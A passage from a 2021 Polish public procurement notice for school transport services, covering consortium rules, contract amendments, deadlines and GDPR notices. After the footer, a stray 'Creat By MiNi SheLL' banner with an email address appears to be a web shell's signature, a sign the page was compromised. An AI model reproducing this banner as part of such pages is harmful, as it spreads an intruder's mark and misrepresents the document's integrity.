Wykonawcy.<br/>3. Pełnomocnictwo do reprezentowania Wykonawcy – jeżeli zostało ustanowione, bądź pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie (dotyczy również spółki cywilnej); Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo) lub notariusz.<br/>4. Oświadczenie na podstawie art. 117 ust. 4 ustawy Pzp – składane w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wzór stanowi załącznik nr 7 do SWZ. <br/>5. Zobowiązanie podmiotu udostępniającego zasoby w trybie art.118 ust.3 ustawy Pzp, (jeżeli wykonawca polega na zdolnościach innych podmiotów) – wraz z oświadczeniem o nie podleganiu wykluczeniu z postępowania i spełnianiu warunków - wzór stanowi załącznik nr 8a do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z pkt. 10.2.1 – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga: <br/>a)	Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>b)	Pełnomocnictwo winno być załączone do oferty i zawierać w szczególności wskazanie:<br/>-	postępowania o zamówienie publiczne, którego dotyczy,<br/>-	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy, z określeniem adresu siedziby,<br/>-	ustanowionego Pełnomocnika,<br/>-	czynności, co do których Pełnomocnik jest upoważniony.<br/>c)	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli, wymienione we właściwym rejestrze.<br/>d) Umowa konsorcjum nie może być umowa przedwstępną ani umową zawartą pod warunkiem zawieszającym.<br/>e) Wspólnicy spółki cywilnej są traktowani jako wykonawcy składający ofertę wspólną.<br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (pkt. 10.1.2 SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Powyższe oznacza, iż:<br/>Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. Zatem ten spośród wykonawców, który posiada zdolności do realizacji zamówienia, tj. spełnia warunki udziału w postępowaniu, powinien zrealizować zamówienie w zakresie, do wykonania którego niezbędne są te zdolności.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w pkt 10.2.2 SWZ, z którego musi jednoznacznie wynikać, które usługi wykonają poszczególni wykonawcy.<br/>Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień niniejszej umowy wymaga zgody obu stron wyrażonej na piśmie pod rygorem nieważności.<br/>2.	Zmiany umowy mogą być dokonywane jedynie w granicach określonych w art. 455 ustawy Prawo zamówień publicznych.<br/>3.	„Zamawiający” zgodnie z art. 455 ust. 1 pkt 2-4 oraz ust.2-4, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia jednej z okoliczności wymienionych poniżej:<br/>a)	zmiany regulacji prawnych wprowadzonych w życie po dacie podpisania umowy a mających wpływ na realizację przedmiotu umowy,<br/>b)	zmiany przepisów prawa dotyczących przetwarzania i bezpieczeństwa danych osobowych, w szczególności w celu dostosowania postanowień umowy do regulacji Unii Europejskiej w tym zakresie, <br/>c)	wystąpienia siły wyższej w rozumieniu Kodeksu Cywilnego,<br/>d)	zmiany nazw, siedziby stron umowy, innych danych identyfikacyjnych,<br/>e)	rezygnacja, zmiana podwykonawcy lub wprowadzenie podwykonawcy, <br/>f)	konieczności zastosowania innego środka transportu w przypadku długotrwałej awarii tj. konieczności zastosowania pojazdu zastępczego odpowiadającemu wymogom zgodnym z ustawą Prawo o ruchu drogowym i ustawą o Transporcie drogowym. Pojazd ten powinien spełniać wymogi określone w § 6 pkt 3 i posiadać obowiązkowe ubezpieczenia OC, NNW i aktualne przeglądy techniczne, stosowne licencje/zezwolenia na przewóz osób, <br/>g)	przewiduje się możliwość wprowadzenia zmiany wysokości wynagrodzenia należnego „Wykonawcy” w przypadku zmiany stawki podatku od towarów i usług - Podatek VAT naliczony będzie według obowiązujących przepisów. Wartość netto określona w umowie będzie niezmienna w trakcie obowiązywania umowy. Zmiana stawki podatku od towarów i usług oraz wartość brutto umowy wprowadzona zostanie aneksem do umowy,<br/>h)	liczby uczniów, przebiegu i długości trasy, wynikających z dodatkowych przystanków zgodnie z potrzebami organizacyjnymi (na wniosek rodzica/opiekuna prawnego),<br/>i)	zmiany rozkładu jazdy,<br/>j)	zmiany pojazdu na większy dostosowując liczbę miejsc siedzących do liczby uczniów zgłoszonych na wniosek rodziców do dowozu lub zmiany pojazdu na zastępczy w przypadku krótkotrwałej awarii pojazdu, planowanego przeglądu, remontu lub innych zdarzeń losowych . Pojazd ten powinien spełniać wymogi określone w § 6 pkt 3 i posiadać obowiązkowe ubezpieczenia OC, NNW i aktualne przeglądy techniczne, stosowne licencje/zezwolenia na przewóz osób,<br/>k)	zmiany terminu rozpoczęcia lub zakończenia świadczenia usług, wynikająca z przyczyn nieleżących po stronie „Wykonawcy”, i „Zamawiającego” w szczególności na niemożliwe do przewidzenia sytuacje np. zawieszenie zajęć w szkole w związku z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, wprowadzeniem stanu klęski żywiołowej itp.,<br/>l)	zmiany terminu rozpoczęcia lub zakończenia świadczenia usług (bez zmiany zakresu i wartości umowy), wynikająca z przyczyn nieleżących po stronie „Wykonawcy”, w szczególności w razie podpisania umowy w terminie uniemożliwiającym rozpoczęcie realizacji usług w terminie pierwotnie określonym,<br/>l)przedłużenia terminu obowiązywania umowy w przypadku niewykorzystania szacowanej wartości brutto przedmiotu umowy, o której mowa w § 16 pkt 2 umowy–w takim przypadku termin wykonania przedmiotu umowy zostanie przedłużony do czasu wykorzystania całkowitej wartości brutto przedmiotu umowy, przypadającej na okres przypadającej na okres wrzesień – grudzień 2021r. oraz osobno na okres styczeń-czerwiec 2022r. W związku z powyższym „Wykonawca” powinien zwrócić się z wnioskiem do „Zamawiającego” o wydłużenie terminu umowy wraz z uzasadnieniem,<br/>ł) zmiany osób skierowanych do realizacji zamówienia (wykazanych w oświadczeniu „Wykonawcy” o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności – opiekun ucznia niepełnosprawnego oraz kierowca) pod warunkiem, że nowe osoby będą spełniać wymagania określone dla nich przez „Zamawiającego” w niniejszej umowie,<br/>Ciąg dalszy w sekcji IX <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. informacji dot. RODO<br/>podanie przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/> posiada Pani/Pan: <br/>-	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>-	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych1; <br/>-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO2; <br/>-	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- nie przysługuje Pani/Panu: <br/>-	w związku z art. 17 ust. 3 lit. B, d lub e RODO prawo do usunięcia danych osobowych; <br/>-	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>-	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. C RODO. <br/>1 Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników<br/> 2 Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>cd. informacji dot. Zmian w umowie<br/>m) zmniejszenia zakresu rzeczowego przedmiotu umowy w związku z w związku z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19 lub wprowadzeniem stanu klęski żywiołowej itp., co jednoznacznie będzie się wiązało zmniejszeniem zapotrzebowania na usługi przewozowe i zmniejszeniem wynagrodzenia, o którym mowa w § 16 ust.1,<br/>n) zmiany zakresu lub sposobu świadczenia usług, w przypadku zmiany przepisów prawa powszechnie obowiązującego mających zastosowanie do przedmiotu umowy, w zakresie niezbędnym do dostosowania umowy do warunków wynikających ze zmienionych przepisów prawa.<br/> 6. Zmiany mogą być dokonane tylko, jeśli:<br/>a)	jest to niezbędne dla prawidłowego wykonania przedmiotu umowy,<br/>b)	jest to niezbędne, aby zgłoszonemu uczniowi niepełnosprawnemu zapewnić realizację obowiązku szkolnego.<br/>7. Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com